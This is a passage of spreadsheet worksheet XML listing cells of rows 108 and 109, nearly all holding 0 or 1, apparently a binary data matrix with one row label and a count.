      <c r="HF108">
        <v>0</v>
      </c>
      <c r="HG108">
        <v>0</v>
      </c>
      <c r="HH108">
        <v>0</v>
      </c>
      <c r="HI108">
        <v>0</v>
      </c>
      <c r="HJ108">
        <v>0</v>
      </c>
      <c r="HK108">
        <v>0</v>
      </c>
      <c r="HL108">
        <v>0</v>
      </c>
      <c r="HM108">
        <v>0</v>
      </c>
      <c r="HN108">
        <v>0</v>
      </c>
      <c r="HO108">
        <v>0</v>
      </c>
      <c r="HP108">
        <v>0</v>
      </c>
      <c r="HQ108">
        <v>0</v>
      </c>
      <c r="HR108">
        <v>0</v>
      </c>
      <c r="HS108">
        <v>0</v>
      </c>
      <c r="HT108">
        <v>0</v>
      </c>
      <c r="HU108">
        <v>0</v>
      </c>
      <c r="HV108">
        <v>0</v>
      </c>
      <c r="HW108">
        <v>0</v>
      </c>
      <c r="HX108">
        <v>0</v>
      </c>
      <c r="HY108">
        <v>0</v>
      </c>
      <c r="HZ108">
        <v>0</v>
      </c>
      <c r="IA108">
        <v>0</v>
      </c>
      <c r="IB108">
        <v>0</v>
      </c>
      <c r="IC108">
        <v>0</v>
      </c>
      <c r="ID108">
        <v>0</v>
      </c>
      <c r="IE108">
        <v>0</v>
      </c>
      <c r="IF108">
        <v>0</v>
      </c>
      <c r="IG108">
        <v>0</v>
      </c>
      <c r="IH108">
        <v>0</v>
      </c>
      <c r="II108">
        <v>0</v>
      </c>
      <c r="IJ108">
        <v>0</v>
      </c>
      <c r="IK108">
        <v>0</v>
      </c>
      <c r="IL108">
        <v>0</v>
      </c>
      <c r="IM108">
        <v>0</v>
      </c>
      <c r="IN108">
        <v>0</v>
      </c>
      <c r="IO108">
        <v>0</v>
      </c>
      <c r="IP108">
        <v>0</v>
      </c>
      <c r="IQ108">
        <v>0</v>
      </c>
      <c r="IR108">
        <v>0</v>
      </c>
      <c r="IS108">
        <v>0</v>
      </c>
      <c r="IT108">
        <v>0</v>
      </c>
      <c r="IU108">
        <v>0</v>
      </c>
      <c r="IV108">
        <v>0</v>
      </c>
      <c r="IW108">
        <v>0</v>
      </c>
      <c r="IX108">
        <v>0</v>
      </c>
      <c r="IY108">
        <v>0</v>
      </c>
      <c r="IZ108">
        <v>0</v>
      </c>
      <c r="JA108">
        <v>0</v>
      </c>
      <c r="JB108">
        <v>0</v>
      </c>
      <c r="JC108">
        <v>0</v>
      </c>
      <c r="JD108">
        <v>0</v>
      </c>
      <c r="JE108">
        <v>0</v>
      </c>
      <c r="JF108">
        <v>0</v>
      </c>
      <c r="JG108">
        <v>0</v>
      </c>
      <c r="JH108">
        <v>0</v>
      </c>
      <c r="JI108">
        <v>0</v>
      </c>
      <c r="JJ108">
        <v>0</v>
      </c>
      <c r="JK108">
        <v>0</v>
      </c>
      <c r="JL108">
        <v>0</v>
      </c>
      <c r="JM108">
        <v>0</v>
      </c>
      <c r="JN108">
        <v>0</v>
      </c>
      <c r="JO108">
        <v>0</v>
      </c>
      <c r="JP108">
        <v>0</v>
      </c>
      <c r="JQ108">
        <v>0</v>
      </c>
      <c r="JR108">
        <v>0</v>
      </c>
      <c r="JS108">
        <v>0</v>
      </c>
      <c r="JT108">
        <v>0</v>
      </c>
      <c r="JU108">
        <v>0</v>
      </c>
      <c r="JV108">
        <v>0</v>
      </c>
      <c r="JW108">
        <v>0</v>
      </c>
      <c r="JX108">
        <v>0</v>
      </c>
      <c r="JY108">
        <v>0</v>
      </c>
      <c r="JZ108">
        <v>0</v>
      </c>
      <c r="KA108">
        <v>0</v>
      </c>
      <c r="KB108">
        <v>0</v>
      </c>
      <c r="KC108">
        <v>0</v>
      </c>
      <c r="KD108">
        <v>0</v>
      </c>
      <c r="KE108">
        <v>0</v>
      </c>
      <c r="KF108">
        <v>0</v>
      </c>
      <c r="KG108">
        <v>0</v>
      </c>
      <c r="KH108">
        <v>0</v>
      </c>
      <c r="KI108">
        <v>0</v>
      </c>
      <c r="KJ108">
        <v>0</v>
      </c>
      <c r="KK108">
        <v>0</v>
      </c>
      <c r="KL108">
        <v>0</v>
      </c>
      <c r="KM108">
        <v>0</v>
      </c>
      <c r="KN108">
        <v>0</v>
      </c>
      <c r="KO108">
        <v>0</v>
      </c>
      <c r="KP108">
        <v>0</v>
      </c>
      <c r="KQ108">
        <v>0</v>
      </c>
      <c r="KR108">
        <v>0</v>
      </c>
      <c r="KS108">
        <v>0</v>
      </c>
      <c r="KT108">
        <v>1</v>
      </c>
      <c r="KU108">
        <v>0</v>
      </c>
      <c r="KV108">
        <v>0</v>
      </c>
      <c r="KW108">
        <v>0</v>
      </c>
      <c r="KX108">
        <v>0</v>
      </c>
      <c r="KY108">
        <v>0</v>
      </c>
      <c r="KZ108">
        <v>0</v>
      </c>
      <c r="LA108">
        <v>0</v>
      </c>
      <c r="LB108">
        <v>0</v>
      </c>
      <c r="LC108">
        <v>0</v>
      </c>
      <c r="LD108">
        <v>0</v>
      </c>
      <c r="LE108">
        <v>0</v>
      </c>
      <c r="LF108">
        <v>0</v>
      </c>
      <c r="LG108">
        <v>0</v>
      </c>
      <c r="LH108">
        <v>0</v>
      </c>
      <c r="LI108">
        <v>0</v>
      </c>
      <c r="LJ108">
        <v>0</v>
      </c>
      <c r="LK108">
        <v>0</v>
      </c>
      <c r="LL108">
        <v>0</v>
      </c>
      <c r="LM108">
        <v>0</v>
      </c>
      <c r="LN108">
        <v>0</v>
      </c>
      <c r="LO108">
        <v>0</v>
      </c>
      <c r="LP108">
        <v>0</v>
      </c>
      <c r="LQ108">
        <v>0</v>
      </c>
      <c r="LR108">
        <v>0</v>
      </c>
      <c r="LS108">
        <v>0</v>
      </c>
      <c r="LT108">
        <v>0</v>
      </c>
      <c r="LU108">
        <v>0</v>
      </c>
      <c r="LV108">
        <v>0</v>
      </c>
      <c r="LW108">
        <v>0</v>
      </c>
      <c r="LX108">
        <v>0</v>
      </c>
      <c r="LY108">
        <v>0</v>
      </c>
      <c r="LZ108">
        <v>0</v>
      </c>
      <c r="MA108">
        <v>0</v>
      </c>
      <c r="MB108">
        <v>0</v>
      </c>
      <c r="MC108">
        <v>0</v>
      </c>
      <c r="MD108">
        <v>0</v>
      </c>
      <c r="ME108">
        <v>0</v>
      </c>
      <c r="MF108">
        <v>0</v>
      </c>
      <c r="MG108">
        <v>0</v>
      </c>
      <c r="MH108">
        <v>0</v>
      </c>
      <c r="MI108">
        <v>0</v>
      </c>
      <c r="MJ108">
        <v>0</v>
      </c>
      <c r="MK108">
        <v>0</v>
      </c>
      <c r="ML108">
        <v>1</v>
      </c>
      <c r="MM108">
        <v>0</v>
      </c>
      <c r="MN108">
        <v>0</v>
      </c>
      <c r="MO108">
        <v>0</v>
      </c>
      <c r="MP108">
        <v>0</v>
      </c>
      <c r="MQ108">
        <v>0</v>
      </c>
      <c r="MR108">
        <v>0</v>
      </c>
      <c r="MS108">
        <v>0</v>
      </c>
      <c r="MT108">
        <v>0</v>
      </c>
      <c r="MU108">
        <v>0</v>
      </c>
      <c r="MV108">
        <v>0</v>
      </c>
      <c r="MW108">
        <v>0</v>
      </c>
      <c r="MX108">
        <v>0</v>
      </c>
      <c r="MY108">
        <v>0</v>
      </c>
      <c r="MZ108">
        <v>0</v>
      </c>
      <c r="NA108">
        <v>0</v>
      </c>
      <c r="NB108">
        <v>0</v>
      </c>
      <c r="NC108">
        <v>0</v>
      </c>
      <c r="ND108">
        <v>0</v>
      </c>
      <c r="NE108">
        <v>0</v>
      </c>
      <c r="NF108">
        <v>0</v>
      </c>
      <c r="NG108">
        <v>0</v>
      </c>
      <c r="NH108">
        <v>0</v>
      </c>
      <c r="NI108">
        <v>0</v>
      </c>
      <c r="NJ108">
        <v>0</v>
      </c>
      <c r="NK108">
        <v>0</v>
      </c>
      <c r="NL108">
        <v>0</v>
      </c>
      <c r="NM108">
        <v>0</v>
      </c>
      <c r="NN108">
        <v>0</v>
      </c>
      <c r="NO108">
        <v>0</v>
      </c>
      <c r="NP108">
        <v>0</v>
      </c>
      <c r="NQ108">
        <v>0</v>
      </c>
      <c r="NR108">
        <v>0</v>
      </c>
      <c r="NS108">
        <v>0</v>
      </c>
      <c r="NT108">
        <v>0</v>
      </c>
      <c r="NU108">
        <v>0</v>
      </c>
      <c r="NV108">
        <v>0</v>
      </c>
      <c r="NW108">
        <v>0</v>
      </c>
      <c r="NX108">
        <v>0</v>
      </c>
      <c r="NY108">
        <v>0</v>
      </c>
      <c r="NZ108">
        <v>0</v>
      </c>
      <c r="OA108">
        <v>0</v>
      </c>
      <c r="OB108">
        <v>0</v>
      </c>
      <c r="OC108">
        <v>0</v>
      </c>
      <c r="OD108">
        <v>0</v>
      </c>
      <c r="OE108">
        <v>0</v>
      </c>
      <c r="OF108">
        <v>0</v>
      </c>
      <c r="OG108">
        <v>0</v>
      </c>
      <c r="OH108">
        <v>0</v>
      </c>
      <c r="OI108">
        <v>0</v>
      </c>
      <c r="OJ108">
        <v>0</v>
      </c>
      <c r="OK108">
        <v>0</v>
      </c>
      <c r="OL108">
        <v>0</v>
      </c>
      <c r="OM108">
        <v>0</v>
      </c>
      <c r="ON108">
        <v>0</v>
      </c>
      <c r="OO108">
        <v>0</v>
      </c>
      <c r="OP108">
        <v>0</v>
      </c>
      <c r="OQ108">
        <v>0</v>
      </c>
      <c r="OR108">
        <v>0</v>
      </c>
      <c r="OS108">
        <v>0</v>
      </c>
      <c r="OT108">
        <v>0</v>
      </c>
      <c r="OU108">
        <v>0</v>
      </c>
      <c r="OV108">
        <v>0</v>
      </c>
      <c r="OW108">
        <v>0</v>
      </c>
      <c r="OX108">
        <v>0</v>
      </c>
      <c r="OY108">
        <v>0</v>
      </c>
      <c r="OZ108">
        <v>0</v>
      </c>
      <c r="PA108">
        <v>0</v>
      </c>
      <c r="PB108">
        <v>0</v>
      </c>
      <c r="PC108">
        <v>0</v>
      </c>
      <c r="PD108">
        <v>0</v>
      </c>
      <c r="PE108">
        <v>0</v>
      </c>
      <c r="PF108">
        <v>0</v>
      </c>
      <c r="PG108">
        <v>0</v>
      </c>
      <c r="PH108">
        <v>0</v>
      </c>
      <c r="PI108">
        <v>0</v>
      </c>
      <c r="PJ108">
        <v>0</v>
      </c>
      <c r="PK108">
        <v>0</v>
      </c>
      <c r="PL108">
        <v>0</v>
      </c>
      <c r="PM108">
        <v>0</v>
      </c>
      <c r="PN108">
        <v>0</v>
      </c>
      <c r="PO108">
        <v>0</v>
      </c>
      <c r="PP108">
        <v>0</v>
      </c>
      <c r="PQ108">
        <v>0</v>
      </c>
      <c r="PR108">
        <v>0</v>
      </c>
      <c r="PS108">
        <v>0</v>
      </c>
      <c r="PT108">
        <v>0</v>
      </c>
      <c r="PU108">
        <v>0</v>
      </c>
      <c r="PV108">
        <v>0</v>
      </c>
      <c r="PW108">
        <v>0</v>
      </c>
      <c r="PX108">
        <v>0</v>
      </c>
      <c r="PY108">
        <v>0</v>
      </c>
      <c r="PZ108">
        <v>0</v>
      </c>
      <c r="QA108">
        <v>0</v>
      </c>
      <c r="QB108">
        <v>0</v>
      </c>
      <c r="QC108">
        <v>0</v>
      </c>
      <c r="QD108">
        <v>0</v>
      </c>
      <c r="QE108">
        <v>0</v>
      </c>
      <c r="QF108">
        <v>0</v>
      </c>
      <c r="QG108">
        <v>1</v>
      </c>
      <c r="QH108">
        <v>0</v>
      </c>
      <c r="QI108">
        <v>0</v>
      </c>
      <c r="QJ108">
        <v>0</v>
      </c>
      <c r="QK108">
        <v>0</v>
      </c>
      <c r="QL108">
        <v>0</v>
      </c>
      <c r="QM108">
        <v>0</v>
      </c>
      <c r="QN108">
        <v>0</v>
      </c>
      <c r="QO108">
        <v>0</v>
      </c>
      <c r="QP108">
        <v>0</v>
      </c>
      <c r="QQ108">
        <v>0</v>
      </c>
      <c r="QR108">
        <v>0</v>
      </c>
      <c r="QS108">
        <v>0</v>
      </c>
      <c r="QT108">
        <v>0</v>
      </c>
      <c r="QU108">
        <v>0</v>
      </c>
      <c r="QV108">
        <v>0</v>
      </c>
      <c r="QW108">
        <v>0</v>
      </c>
      <c r="QX108">
        <v>0</v>
      </c>
      <c r="QY108">
        <v>0</v>
      </c>
      <c r="QZ108">
        <v>0</v>
      </c>
      <c r="RA108">
        <v>0</v>
      </c>
      <c r="RB108">
        <v>0</v>
      </c>
      <c r="RC108">
        <v>0</v>
      </c>
      <c r="RD108">
        <v>0</v>
      </c>
      <c r="RE108">
        <v>0</v>
      </c>
      <c r="RF108">
        <v>0</v>
      </c>
      <c r="RG108">
        <v>0</v>
      </c>
      <c r="RH108">
        <v>0</v>
      </c>
      <c r="RI108">
        <v>0</v>
      </c>
      <c r="RJ108">
        <v>0</v>
      </c>
      <c r="RK108">
        <v>0</v>
      </c>
      <c r="RL108">
        <v>0</v>
      </c>
      <c r="RM108">
        <v>0</v>
      </c>
      <c r="RN108">
        <v>0</v>
      </c>
      <c r="RO108">
        <v>0</v>
      </c>
      <c r="RP108">
        <v>0</v>
      </c>
      <c r="RQ108">
        <v>0</v>
      </c>
      <c r="RR108">
        <v>0</v>
      </c>
      <c r="RS108">
        <v>0</v>
      </c>
      <c r="RT108">
        <v>0</v>
      </c>
      <c r="RU108">
        <v>0</v>
      </c>
      <c r="RV108">
        <v>0</v>
      </c>
      <c r="RW108">
        <v>0</v>
      </c>
      <c r="RX108">
        <v>0</v>
      </c>
      <c r="RY108">
        <v>0</v>
      </c>
      <c r="RZ108">
        <v>0</v>
      </c>
      <c r="SA108">
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A109" s="6" t="s">
        <v>3685</v>
      </c>
      <c r="B109">
        <v>61</v>
      </c>
      <c r="C109">
        <v>0</v>
      </c>
      <c r="D109">
        <v>0</v>
      </c>
      <c r="E109">
        <v>0</v>
      </c>
      <c r="F109">
        <v>1</v>
      </c>
      <c r="G109">
        <v>0</v>
      </c>
      <c r="H109">
        <v>0</v>
      </c>
      <c r="I109">
        <v>0</v>
      </c>
      <c r="J109">
        <v>0</v>
      </c>
      <c r="K109">
        <v>0</v>
      </c>
      <c r="L109">
        <v>1</v>
      </c>
      <c r="M109">
        <v>0</v>
      </c>
      <c r="N109">
        <v>0</v>
      </c>
      <c r="O109">
        <v>1</v>
      </c>
      <c r="P109">
        <v>1</v>
      </c>
      <c r="Q109">
        <v>0</v>
      </c>
      <c r="R109">
        <v>0</v>
      </c>
      <c r="S109">
        <v>0</v>
      </c>
      <c r="T109">
        <v>0</v>
      </c>
      <c r="U109">
        <v>1</v>
      </c>
      <c r="V109">
        <v>0</v>
      </c>
      <c r="W109">
        <v>0</v>
      </c>
      <c r="X109">
        <v>0</v>
      </c>
      <c r="Y109">
        <v>0</v>
      </c>
      <c r="Z109">
        <v>0</v>
      </c>
      <c r="AA109">
        <v>0</v>
      </c>
      <c r="AB109">
        <v>0</v>
      </c>
      <c r="AC109">
        <v>1</v>
      </c>
      <c r="AD109">
        <v>0</v>
      </c>
      <c r="AE109">
        <v>0</v>
      </c>
      <c r="AF109">
        <v>0</v>
      </c>
      <c r="AG109">
        <v>0</v>
      </c>
      <c r="AH109">
        <v>0</v>
      </c>
      <c r="AI109">
        <v>0</v>
      </c>
      <c r="AJ109">
        <v>0</v>
      </c>
      <c r="AK109">
        <v>0</v>
      </c>
      <c r="AL109">
        <v>0</v>
      </c>
      <c r="AM109">
        <v>0</v>
      </c>
      <c r="AN109">
        <v>1</v>
      </c>
      <c r="AO109">
        <v>0</v>
      </c>
      <c r="AP109">
        <v>0</v>
      </c>
      <c r="AQ109">
        <v>0</v>
      </c>
      <c r="AR109">
        <v>0</v>
      </c>
      <c r="AS109">
        <v>0</v>
      </c>
      <c r="AT109">
        <v>0</v>
      </c>
      <c r="AU109">
        <v>0</v>
      </c>
      <c r="AV109">
        <v>0</v>
      </c>
      <c r="AW109">
        <v>0</v>
      </c>
      <c r="AX109">
        <v>0</v>
      </c>
      <c r="AY109">
        <v>0</v>
      </c>
      <c r="AZ109">
        <v>0</v>
      </c>
      <c r="BA109">
        <v>0</v>
      </c>
      <c r="BB109">
        <v>0</v>
      </c>
      <c r="BC109">
        <v>0</v>
      </c>
      <c r="BD109">
        <v>0</v>
      </c>
      <c r="BE109">
        <v>0</v>
      </c>
      <c r="BF109">
        <v>0</v>
      </c>
      <c r="BG109">
        <v>0</v>
      </c>
      <c r="BH109">
        <v>0</v>
      </c>
      <c r="BI109">
        <v>0</v>
      </c>
      <c r="BJ109">
        <v>0</v>
      </c>
      <c r="BK109">
        <v>1</v>
      </c>
      <c r="BL109">
        <v>1</v>
      </c>
      <c r="BM109">
        <v>0</v>
      </c>
      <c r="BN109">
        <v>1</v>
      </c>
      <c r="BO109">
        <v>0</v>
      </c>
      <c r="BP109">
        <v>0</v>
      </c>
      <c r="BQ109">
        <v>0</v>
      </c>
      <c r="BR109">
        <v>1</v>
      </c>
      <c r="BS109">
        <v>0</v>
      </c>
      <c r="BT109">
        <v>0</v>
      </c>
      <c r="BU109">
        <v>0</v>
      </c>
      <c r="BV109">
        <v>0</v>
      </c>
      <c r="BW109">
        <v>0</v>
      </c>
      <c r="BX109">
        <v>0</v>
      </c>
      <c r="BY109">
        <v>0</v>
      </c>
      <c r="BZ109">
        <v>0</v>
      </c>
      <c r="CA109">
        <v>0</v>
      </c>
      <c r="CB109">
        <v>0</v>
      </c>
      <c r="CC109">
        <v>0</v>
      </c>
      <c r="CD109">
        <v>0</v>
      </c>
      <c r="CE109">
        <v>0</v>
      </c>
      <c r="CF109">
        <v>0</v>
      </c>
      <c r="CG109">
        <v>0</v>
      </c>
      <c r="CH109">
        <v>0</v>
      </c>
      <c r="CI109">
        <v>0</v>
      </c>
      <c r="CJ109">
        <v>0</v>
      </c>
      <c r="CK109">
        <v>1</v>
      </c>
      <c r="CL109">
        <v>0</v>
      </c>
      <c r="CM109">
        <v>0</v>
      </c>
      <c r="CN109">
        <v>0</v>
      </c>
      <c r="CO109">
        <v>0</v>
      </c>
      <c r="CP109">
        <v>0</v>
      </c>
      <c r="CQ109">
        <v>0</v>
      </c>
      <c r="CR109">
        <v>0</v>
      </c>
      <c r="CS109">
        <v>0</v>
      </c>
      <c r="CT109">
        <v>0</v>
      </c>
      <c r="CU109">
        <v>0</v>
      </c>
      <c r="CV109">
        <v>0</v>
      </c>
      <c r="CW109">
        <v>1</v>
      </c>
      <c r="CX109">
        <v>0</v>
      </c>
      <c r="CY109">
        <v>0</v>
      </c>
      <c r="CZ109">
        <v>0</v>
      </c>
      <c r="DA109">
        <v>0</v>
      </c>
      <c r="DB109">
        <v>1</v>
      </c>
      <c r="DC109">
        <v>0</v>
      </c>
      <c r="DD109">
        <v>0</v>
      </c>
      <c r="DE109">
        <v>1</v>
      </c>
      <c r="DF109">
        <v>1</v>
      </c>
      <c r="DG109">
        <v>0</v>
      </c>
      <c r="DH109">
        <v>0</v>
      </c>
      <c r="DI109">
        <v>1</v>
      </c>
      <c r="DJ109">
        <v>1</v>
      </c>
      <c r="DK109">
        <v>0</v>
      </c>
      <c r="DL109">
        <v>0</v>
      </c>
      <c r="DM109">
        <v>0</v>
      </c>
      <c r="DN109">
        <v>1</v>
      </c>
      <c r="DO109">
        <v>1</v>
      </c>
      <c r="DP109">
        <v>0</v>
      </c>
      <c r="DQ109">
        <v>0</v>
      </c>
      <c r="DR109">
        <v>0</v>
      </c>
      <c r="DS109">
        <v>0</v>
      </c>
      <c r="DT109">
        <v>0</v>
      </c>
      <c r="DU109">
        <v>0</v>
      </c>
      <c r="DV109">
        <v>0</v>
      </c>
      <c r="DW109">
        <v>0</v>
      </c>
      <c r="DX109">
        <v>0</v>
      </c>
      <c r="DY109">
        <v>0</v>
      </c>
      <c r="DZ109">
        <v>0</v>
      </c>
      <c r="EA109">
        <v>0</v>
      </c>
      <c r="EB109">
        <v>0</v>
      </c>
      <c r="EC109">
        <v>0</v>
      </c>
      <c r="ED109">
        <v>0</v>
      </c>
      <c r="EE109">
        <v>0</v>
      </c>
      <c r="EF109">
        <v>0</v>
      </c>
      <c r="EG109">
        <v>0</v>
      </c>
      <c r="EH109">
        <v>0</v>
      </c>
      <c r="EI109">
        <v>0</v>
      </c>
      <c r="EJ109">
        <v>0</v>
      </c>
      <c r="EK109">
        <v>0</v>
      </c>
      <c r="EL109">
        <v>0</v>
      </c>
      <c r="EM109">
        <v>0</v>
      </c>
      <c r="EN109">
        <v>0</v>
      </c>
      <c r="EO109">
        <v>0</v>
      </c>
      <c r="EP109">
        <v>0</v>
      </c>
      <c r="EQ109">
        <v>0</v>
      </c>
      <c r="ER109">
        <v>0</v>
      </c>
      <c r="ES109">
        <v>0</v>
      </c>
      <c r="ET109">
        <v>0</v>
      </c>
      <c r="EU109">
        <v>0</v>
      </c>
      <c r="EV109">
        <v>1</v>
      </c>
      <c r="EW109">
        <v>1</v>
      </c>
      <c r="EX109">
        <v>1</v>
      </c>
      <c r="EY109">
        <v>1</v>
      </c>
      <c r="EZ109">
        <v>0</v>
      </c>
      <c r="FA109">
        <v>0</v>
      </c>
      <c r="FB109">
        <v>0</v>
      </c>
      <c r="FC109">
        <v>0</v>
      </c>
      <c r="FD109">
        <v>0</v>
      </c>
      <c r="FE109">
        <v>0</v>
      </c>
      <c r="FF109">
        <v>0</v>
      </c>
      <c r="FG109">
        <v>0</v>
      </c>
      <c r="FH109">
        <v>1</v>
      </c>
      <c r="FI109">
        <v>0</v>
      </c>
      <c r="FJ109">
        <v>0</v>
      </c>
      <c r="FK109">
        <v>0</v>
      </c>
      <c r="FL109">
        <v>1</v>
      </c>
      <c r="FM109">
        <v>0</v>
      </c>
      <c r="FN109">
        <v>0</v>
      </c>
      <c r="FO109">
        <v>0</v>
      </c>
      <c r="FP109">
        <v>0</v>
      </c>
      <c r="FQ109">
        <v>0</v>
      </c>
      <c r="FR109">
        <v>0</v>
      </c>
      <c r="FS109">
        <v>0</v>
      </c>
      <c r="FT109">
        <v>0</v>
      </c>
      <c r="FU109">
        <v>0</v>
      </c>
      <c r="FV109">
        <v>0</v>
      </c>
      <c r="FW109">
        <v>1</v>
      </c>
      <c r="FX109">
        <v>0</v>
      </c>
      <c r="FY109">
        <v>0</v>
      </c>
      <c r="FZ109">
        <v>0</v>
      </c>
      <c r="GA109">
        <v>0</v>
      </c>
      <c r="GB109">
        <v>0</v>
      </c>
      <c r="GC109">
        <v>1</v>
      </c>
      <c r="GD109">
        <v>0</v>
      </c>
      <c r="GE109">
        <v>0</v>
      </c>
      <c r="GF109">
        <v>0</v>
      </c>
      <c r="GG109">
        <v>0</v>
      </c>
      <c r="GH109">
        <v>0</v>
      </c>
      <c r="GI109">
        <v>0</v>
      </c>
      <c r="GJ109">
        <v>0</v>
      </c>
      <c r="GK109">
        <v>0</v>
      </c>
      <c r="GL109">
        <v>0</v>
      </c>
      <c r="GM109">
        <v>0</v>
      </c>
      <c r="GN109">
        <v>0</v>
      </c>
      <c r="GO109">
        <v>0</v>
      </c>
      <c r="GP109">
        <v>0</v>
      </c>
      <c r="GQ109">
        <v>1</v>
      </c>
      <c r="GR109">
        <v>0</v>
      </c>
      <c r="GS109">
        <v>0</v>
      </c>
      <c r="GT109">
        <v>0</v>
      </c>
      <c r="GU109">
        <v>0</v>
      </c>
      <c r="GV109">
        <v>0</v>
      </c>
      <c r="GW109">
        <v>1</v>
      </c>
      <c r="GX109">
        <v>0</v>
      </c>
      <c r="GY109">
        <v>0</v>
      </c>
      <c r="GZ109">
        <v>0</v>
      </c>
      <c r="HA109">
        <v>0</v>
      </c>
      <c r="HB109">
        <v>0</v>
      </c>
      <c r="HC109">
        <v>0</v>
      </c>
      <c r="HD109">
        <v>0</v>
      </c>
      <c r="HE109">
        <v>0</v>
      </c>
      <c r="HF109">
        <v>0</v>
      </c>
      <c r="HG109">
        <v>1</v>
      </c>
      <c r="HH109">
        <v>0</v>
      </c>
      <c r="HI109">
        <v>0</v>
      </c>
      <c r="HJ109">
        <v>0</v>
      </c>
      <c r="HK109">
        <v>0</v>
      </c>
      <c r="HL109">
        <v>1</v>
      </c>
      <c r="HM109">
        <v>0</v>
      </c>
      <c r="HN109">
        <v>0</v>
      </c>
      <c r="HO109">
        <v>0</v>
      </c>
      <c r="HP109">
        <v>0</v>
      </c>
      <c r="HQ109">
        <v>0</v>
      </c>
      <c r="HR109">
        <v>0</v>
      </c>
      <c r="HS109">
        <v>0</v>
      </c>
      <c r="HT109">
        <v>0</v>
      </c>
      <c r="HU109">
        <v>0</v>
      </c>
      <c r="HV109">
        <v>1</v>
      </c>
      <c r="HW109">
        <v>0</v>
      </c>
      <c r="HX109">
        <v>0</v>
      </c>
      <c r="HY109">
        <v>0</v>
      </c>
      <c r="HZ109">
        <v>1</v>
      </c>
      <c r="IA109">
        <v>0</v>
      </c>
      <c r="IB109">
        <v>0</v>
      </c>
      <c r="IC109">
        <v>0</v>
      </c>
      <c r="ID109">
        <v>0</v>
      </c>
      <c r="IE109">
        <v>0</v>
      </c>
      <c r="IF109">
        <v>0</v>
      </c>
      <c r="IG109">
        <v>0</v>
      </c>
      <c r="IH109">
        <v>0</v>
      </c>
      <c r="II109">
        <v>0</v>
      </c>
      <c r="IJ109">
        <v>0</v>
      </c>
      <c r="IK109">
        <v>0</v>
      </c>
      <c r="IL109">
        <v>0</v>
      </c>
      <c r="IM109">
        <v>1</v>
      </c>
      <c r="IN109">
        <v>0</v>
      </c>
      <c r="IO109">
        <v>0</v>
      </c>
      <c r="IP109">
        <v>0</v>
      </c>
      <c r="IQ109">
        <v>0</v>
      </c>
      <c r="IR109">
        <v>0</v>
      </c>
      <c r="IS109">
        <v>0</v>
      </c>
      <c r="IT109">
        <v>1</v>
      </c>
      <c r="IU109">
        <v>0</v>
      </c>
      <c r="IV109">
        <v>0</v>
      </c>
      <c r="IW109">
        <v>0</v>
      </c>
      <c r="IX109">
        <v>0</v>
      </c>
      <c r="IY109">
        <v>0</v>
      </c>
      <c r="IZ109">
        <v>0</v>
      </c>
      <c r="JA109">
        <v>0</v>
      </c>
      <c r="JB109">
        <v>0</v>
      </c>
      <c r="JC109">
        <v>0</v>
      </c>
      <c r="JD109">
        <v>0</v>
      </c>
      <c r="JE109">
        <v>0</v>
      </c>
      <c r="JF109">
        <v>0</v>
      </c>
      <c r="JG109">
        <v>0</v>
      </c>
      <c r="JH109">
        <v>0</v>
      </c>
      <c r="JI109">
        <v>0</v>
      </c>
      <c r="JJ109">
        <v>0</v>
      </c>
      <c r="JK109">
        <v>0</v>
      </c>
      <c r="JL109">
        <v>0</v>
      </c>
      <c r="JM109">
        <v>0</v>
      </c>
      <c r="JN109">
        <v>0</v>
      </c>
      <c r="JO109">
        <v>0</v>
      </c>
      <c r="JP109">
        <v>1</v>
      </c>
      <c r="JQ109">
        <v>0</v>
      </c>
      <c r="JR109">
        <v>0</v>
      </c>
      <c r="JS109">
        <v>1</v>
      </c>
      <c r="JT109">
        <v>0</v>
      </c>
      <c r="JU109">
        <v>0</v>
      </c>
      <c r="JV109">
        <v>0</v>
      </c>
      <c r="JW109">
        <v>0</v>
      </c>
      <c r="JX109">
        <v>0</v>
      </c>
      <c r="JY109">
        <v>0</v>
      </c>
      <c r="JZ109">
        <v>0</v>
      </c>
      <c r="KA109">
        <v>0</v>
      </c>
      <c r="KB109">
        <v>0</v>
      </c>
      <c r="KC109">
        <v>0</v>
      </c>
      <c r="KD109">
        <v>0</v>
      </c>
      <c r="KE109">
        <v>0</v>
      </c>
      <c r="KF109">
        <v>0</v>
      </c>
      <c r="KG109">
        <v>0</v>
      </c>
      <c r="KH109">
        <v>0</v>
      </c>
      <c r="KI109">
        <v>0</v>
      </c>
      <c r="KJ109">
        <v>0</v>
      </c>
      <c r="KK109">
        <v>0</v>
      </c>
      <c r="KL109">
        <v>0</v>
      </c>
      <c r="KM109">
        <v>1</v>
      </c>
      <c r="KN109">
        <v>0</v>
      </c>
      <c r="KO109">
        <v>0</v>
      </c>
      <c r="KP109">
        <v>0</v>
      </c>
      <c r="KQ109">
        <v>0</v>
      </c>
      <c r="KR109">
        <v>0</v>
      </c>
      <c r="KS109">
        <v>0</v>
      </c>
      <c r="KT109">
        <v>1</v>
      </c>
      <c r="KU109">
        <v>0</v>
      </c>
      <c r="KV109">
        <v>0</v>
      </c>
      <c r="KW109">
        <v>0</v>
      </c>
      <c r="KX109">
        <v>0</v>
      </c>
      <c r="KY109">
        <v>0</v>
      </c>
      <c r="KZ109">
        <v>0</v>
      </c>
      <c r="LA109">
        <v>1</v>
      </c>
      <c r="LB109">
        <v>0</v>
      </c>
      <c r="LC109">
        <v>0</v>
      </c>
      <c r="LD109">
        <v>0</v>
      </c>
      <c r="LE109">
        <v>0</v>
      </c>
      <c r="LF109">
        <v>1</v>
      </c>
      <c r="LG109">
        <v>0</v>
      </c>
      <c r="LH109">
        <v>1</v>
      </c>
      <c r="LI109">
        <v>1</v>
      </c>
      <c r="LJ109">
        <v>1</v>
      </c>
      <c r="LK109">
        <v>0</v>
      </c>
      <c r="LL109">
        <v>0</v>
      </c>
      <c r="LM109">
        <v>0</v>
      </c>
      <c r="LN109">
        <v>0</v>
      </c>
      <c r="LO109">
        <v>0</v>
      </c>
      <c r="LP109">
        <v>1</v>
      </c>
      <c r="LQ109">
        <v>0</v>
      </c>
      <c r="LR109">
        <v>1</v>
      </c>
      <c r="LS109">
        <v>0</v>
      </c>
      <c r="LT109">
        <v>0</v>
      </c>
      <c r="LU109">
        <v>0</v>
      </c>
      <c r="LV109">
        <v>1</v>
      </c>
      <c r="LW109">
        <v>0</v>
      </c>
      <c r="LX109">
        <v>0</v>
      </c>
      <c r="LY109">
        <v>0</v>
      </c>
      <c r="LZ109">
        <v>0</v>
      </c>
      <c r="MA109">
        <v>0</v>
      </c>
